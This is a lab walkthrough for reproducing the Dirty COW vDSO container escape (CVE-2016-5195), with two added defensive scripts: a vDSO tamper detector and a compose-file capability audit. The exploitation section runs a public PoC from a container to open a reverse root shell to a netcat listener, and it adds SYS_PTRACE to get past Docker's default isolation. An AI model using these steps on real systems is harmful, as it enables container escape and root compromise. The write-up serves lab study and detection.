A race condition means that tasks execute in an unexpected order, which can crash an application or expose it to code execution by an attacker. Using this vulnerability, an attacker can escalate privileges on the target system, up to and including root. VDSO stands for Virtual Dynamic Shared Object, a virtual .so provided by the kernel. The .so lives in the kernel rather than on disk: when a program starts, the kernel maps the memory pages containing it into the program's address space, and the program can then call its functions as it would those of any ordinary .so.

Inside a container, the Dirty COW bug can be triggered against the clock_gettime() function in the VDSO mapping to crash the system and obtain a root shell.
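From a defender's point of view, the property that makes this attack work also makes it detectable: the vDSO is a single kernel-owned ELF image mapped into every process, so a clock_gettime() patched in by the exploit is visible from any process that dumps its own [vdso] mapping. The script below is an added example for this write-up, not code from the original post or from the dirtycow-vdso project. It assumes Linux /proc is available and that a baseline fingerprint was recorded on a known-clean boot of the same kernel build (the vDSO bytes differ between builds); the /proc maps text embedded in it is constructed.

```python
"""Detect tampering with the kernel's vDSO image from user space.

Added example, not part of the original write-up. Baseline hashes are
assumed to come from a known-clean boot of the same kernel build; the
maps text below is constructed.
"""
import hashlib
import re

# One /proc/<pid>/maps line: "start-end perms offset dev inode [pathname]"
_MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\S+\s+\S+\s*(.*)$")

# Constructed sample of /proc/self/maps (only the tail that matters).
SAMPLE_MAPS = """\
7ffd4b3c2000-7ffd4b3e3000 rw-p 00000000 00:00 0                          [stack]
7ffd4b3f5000-7ffd4b3f7000 r--p 00000000 00:00 0                          [vvar]
7ffd4b3f7000-7ffd4b3f9000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
"""


def find_vdso_range(maps_text):
    """Return (start, end) of the [vdso] mapping, or None if absent."""
    for line in maps_text.splitlines():
        m = _MAPS_LINE.match(line)
        if m and m.group(4).strip() == "[vdso]":
            return int(m.group(1), 16), int(m.group(2), 16)
    return None


def read_vdso(pid="self"):
    """Dump a process's vDSO image via /proc/<pid>/mem (Linux only).

    Reading our own memory needs no extra privilege; reading another
    process's memory requires ptrace access to that process.
    """
    with open(f"/proc/{pid}/maps") as maps:
        rng = find_vdso_range(maps.read())
    if rng is None:
        raise RuntimeError("no [vdso] mapping found")
    start, end = rng
    with open(f"/proc/{pid}/mem", "rb") as mem:
        mem.seek(start)
        return mem.read(end - start)


def vdso_fingerprint(image):
    """SHA-256 of the image, after checking it is an ELF object."""
    if image[:4] != b"\x7fELF":
        raise ValueError("vDSO image does not start with the ELF magic")
    return hashlib.sha256(image).hexdigest()


def check_against_baseline(image, baseline_hex):
    """True when the live image matches the baseline recorded for this kernel."""
    return vdso_fingerprint(image) == baseline_hex


def changed_ranges(reference, current):
    """List (offset, length) runs where current differs from reference.

    For forensics the offsets can be mapped to a symbol (here inside
    __vdso_clock_gettime) with readelf/objdump on a clean copy of the vDSO.
    """
    runs, start = [], None
    n = max(len(reference), len(current))
    for i in range(n):
        same = (i < len(reference) and i < len(current)
                and reference[i] == current[i])
        if not same and start is None:
            start = i
        elif same and start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, n - start))
    return runs


if __name__ == "__main__":
    # Live check: print the fingerprint to record as a baseline, or compare
    # the running kernel's vDSO with a baseline passed on the command line.
    import sys
    live = read_vdso()
    fp = vdso_fingerprint(live)
    if len(sys.argv) > 1:
        print("vDSO matches baseline" if fp == sys.argv[1]
              else "vDSO DIFFERS from baseline")
    else:
        print(f"vDSO fingerprint ({len(live)} bytes): {fp}")
```

Run it once on a clean host to record the fingerprint, then periodically (or from an incident-response shell) with that fingerprint as the argument; a mismatch on the same kernel build means the in-memory vDSO no longer matches what the kernel shipped, and changed_ranges() against a saved clean dump shows where the patch landed.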
【Vulnerable environment】

Linux kernel version: kernel 2.x ~ kernel 4.8.3

【Environment setup】

- Build the vulnerable environment with the metarget range

【Exploitation】
```
root@zyliang:~/metarget# ./metarget cnv list | grep 2016-5195
| cve-2016-5195 | kernel | container_escape |
root@zyliang:~/metarget# ./metarget cnv install cve-2016-5195
cve-2016-5195 is going to be installed
switching kernel by version
adding apt repository deb http://security.ubuntu.com/ubuntu trusty-security main
adding apt repository deb http://security.ubuntu.com/ubuntu xenial-security main
adding apt repository deb http://security.ubuntu.com/ubuntu bionic-security main
switching kernel version with apt
installing kernel package linux-image-4.2.0-42-generic
modifying grub config file
updating grub
cve-2016-5195 successfully installed
reboot system now? (y/n) y
# reboot
root@zyliang:~# uname -a
Linux zyliang 4.2.0-42-generic #49~14.04.1-Ubuntu SMP Wed Jun 29 20:22:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
- Download the test environment

```
root@zyliang:~# git clone https://github.com/gebl/dirtycow-docker-vdso.git
Cloning into 'dirtycow-docker-vdso'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11
Unpacking objects: 100% (11/11), done.
```
- On the remote machine, listen on a local port

```
root@master:~# ifconfig ens160
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.160.35.200  netmask 255.255.255.0  broadcast 10.160.35.255
        inet6 fe80::250:56ff:fead:4476  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:ad:44:76  txqueuelen 1000  (Ethernet)
        RX packets 26461525  bytes 2973982791 (2.9 GB)
        RX errors 0  dropped 71  overruns 0  frame 0
        TX packets 26412095  bytes 16041084586 (16.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@master:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
```
- Run the test container

```
root@zyliang:~/dirtycow-docker-vdso# sudo docker-compose run dirtycow /bin/bash
root@3a91b45e2ca5:/# ls
bin  boot  dev  dirtycow-vdso  etc  home  lib  lib64  media  mnt  opt  proc  root  run  runnit.sh  sbin  srv  sys  tmp  usr  var
```
- Inside the container, compile the PoC and run it

```
root@3a91b45e2ca5:/# cd dirtycow-vdso/
root@3a91b45e2ca5:/dirtycow-vdso# ls
0xdeadbeef.c  LICENSE  Makefile  README.md  payload.s  tools
root@3a91b45e2ca5:/dirtycow-vdso# make
nasm -f bin -o payload payload.s
xxd -i payload payload.h
cc -o 0xdeadbeef.o -c 0xdeadbeef.c -Wall
cc -o 0xdeadbeef 0xdeadbeef.o -lpthread
root@3a91b45e2ca5:/dirtycow-vdso# ./
.git/       0xdeadbeef  tools/
root@3a91b45e2ca5:/dirtycow-vdso# ./0xdeadbeef 10.160.35.200:1234
[*] payload target: 10.160.35.200:1234
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
^C
```
- The remote machine 10.160.35.200 receives a shell on the host

```
root@master:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.160.36.203 60936 received!
ifconfig
br-39727c7d519e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:e6ff:fe3c:bab4  prefixlen 64  scopeid 0x20<link>
        ether 02:42:e6:3c:ba:b4  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5  bytes 438 (438.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
cni0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1450
        inet 10.244.0.1  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::70ed:64ff:fe65:fcda  prefixlen 64  scopeid 0x20<link>
        ether 72:ed:64:65:fc:da  txqueuelen 1000  (Ethernet)
        RX packets 568  bytes 41403 (41.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 564  bytes 187916 (187.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:f7:00:90:09  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.160.36.203  netmask 255.255.255.0  broadcast 10.160.36.255
        inet6 fe80::250:56ff:fead:54b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:ad:05:4b  txqueuelen 1000  (Ethernet)
        RX packets 703  bytes 89044 (89.0 KB)
        RX errors 0  dropped 12  overruns 0  frame 0
        TX packets 441  bytes 97055 (97.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

【Problems encountered】
- Running the PoC after compiling it in the container gives a segmentation fault
  - Symptom:

```
root@fddcd5e6574d:/dirtycow-vdso# ./0xdeadbeef
[*] payload target: 127.0.0.1:1234
[*] exploit: patch 1/2
Segmentation fault
```
  - Cause: the Docker version in the PoC environment is too new and denies all capabilities by default
  - Fix: add SYS_PTRACE to the container's capabilities

```
root@zyliang:~/dirtycow-docker-vdso# pwd
/root/dirtycow-docker-vdso
root@zyliang:~/dirtycow-docker-vdso# cat docker-compose.yml
version: '2'
services:
  dirtycow:
    build: .
    restart: unless-stopped
    cap_add:
      - SYS_PTRACE
```
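Read from the defender's side, the segfault above is Docker's default isolation doing its job: a container starts with a restricted capability set and the default seccomp profile, and that profile gates the ptrace syscall on CAP_SYS_PTRACE (newer Docker releases also allow it unconditionally on kernels 4.8 and later), so the `cap_add: SYS_PTRACE` line is what re-enables the write primitive the PoC relies on. The audit below is an added example for this write-up, not code from the original post or from Docker or Compose. It assumes the compose file has already been loaded into a dict (for instance with `yaml.safe_load`); the two compose dicts are constructed, the first being the parsed form of the docker-compose.yml shown above and the second a hardened variant, and the list of capabilities it flags is this example's own choice, not a Docker rule set.

```python
"""Audit docker-compose service definitions for settings that weaken the
default container isolation (added example, not part of the write-up).

Input is the parsed compose document (a dict such as yaml.safe_load
returns); findings are (service, key, value) tuples.
"""

# Capabilities whose addition a reviewer should have to justify. SYS_PTRACE is
# the one added above; the others are common container-escape enablers.
# This deny-list is the example's own assumption, not a Docker rule set.
RISKY_CAPS = {"ALL", "SYS_PTRACE", "SYS_ADMIN", "SYS_MODULE", "SYS_RAWIO",
              "DAC_READ_SEARCH", "NET_ADMIN", "SYS_BOOT"}


def normalize_cap(cap):
    """Accept 'SYS_PTRACE', 'sys_ptrace' or 'CAP_SYS_PTRACE' and return 'SYS_PTRACE'."""
    cap = str(cap).strip().upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_service(name, service):
    """Return findings for one service entry, in a fixed key order."""
    findings = []
    if service.get("privileged") is True:
        # privileged: true turns off the capability bounding set, seccomp and
        # device restrictions at once.
        findings.append((name, "privileged", "true"))
    for cap in service.get("cap_add") or []:
        cap = normalize_cap(cap)
        if cap in RISKY_CAPS:
            findings.append((name, "cap_add", cap))
    for opt in service.get("security_opt") or []:
        # Compose writes "seccomp:unconfined"; the docker CLI form is
        # "seccomp=unconfined". Normalise both before comparing.
        key, _, value = str(opt).replace("=", ":", 1).partition(":")
        if (key.strip().lower() in ("seccomp", "apparmor")
                and value.strip().lower() == "unconfined"):
            findings.append((name, "security_opt", f"{key.strip().lower()}:unconfined"))
    for ns in ("pid", "network", "ipc"):
        # Sharing a host namespace removes the isolation that namespace provides.
        if service.get(ns) == "host":
            findings.append((name, ns, "host"))
    return findings


def audit_compose(compose):
    """Audit every service in a parsed compose document."""
    findings = []
    for name, service in (compose.get("services") or {}).items():
        findings.extend(audit_service(name, service or {}))
    return findings


# Constructed: the parsed form of the docker-compose.yml shown above.
WEAK_COMPOSE = {
    "version": "2",
    "services": {
        "dirtycow": {
            "build": ".",
            "restart": "unless-stopped",
            "cap_add": ["SYS_PTRACE"],
        }
    },
}

# Constructed: a hardened variant that drops every capability, blocks
# privilege gain via setuid binaries and keeps the root filesystem read-only.
HARDENED_COMPOSE = {
    "version": "2",
    "services": {
        "dirtycow": {
            "build": ".",
            "restart": "unless-stopped",
            "cap_drop": ["ALL"],
            "security_opt": ["no-new-privileges:true"],
            "read_only": True,
        }
    },
}


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_COMPOSE), ("hardened", HARDENED_COMPOSE)):
        print(f"{label}: {audit_compose(doc) or 'no findings'}")
```

Two caveats for anyone using this as more than an illustration: the container profile only removes this PoC's write primitive, and the kernel stays vulnerable to CVE-2016-5195 until it is patched, which is the actual fix; and a clean audit result says nothing about a container that was started with `docker run --privileged` or `--cap-add` outside of Compose, so the same checks belong on the running container's HostConfig as well.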
- Image build fails because of network problems
  - Problem: https://github.com/scumjr/dirtycow-vdso.git cannot be downloaded from inside the container

```
root@zyliang:~/dirtycow-docker-vdso# cat Dockerfile
FROM ubuntu:14.04
RUN apt-get update
RUN apt-get install -y build-essential
RUN apt-get install -y nasm
RUN apt-get install -y git
RUN mkdir /dirtycow-vdso
RUN git clone https://github.com/scumjr/dirtycow-vdso.git /dirtycow-vdso
ADD runnit.sh /
RUN chmod 755 /runnit.sh
EXPOSE 1234
CMD ["/runnit.sh"]
root@zyliang:~/dirtycow-docker-vdso#
```
  - Fix:
    1. Retry the build and the download several times
    2. Comment out the git clone line and the steps after it, download the project by other means, then tar it up and copy the archive into the container

【Other PoCs】
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
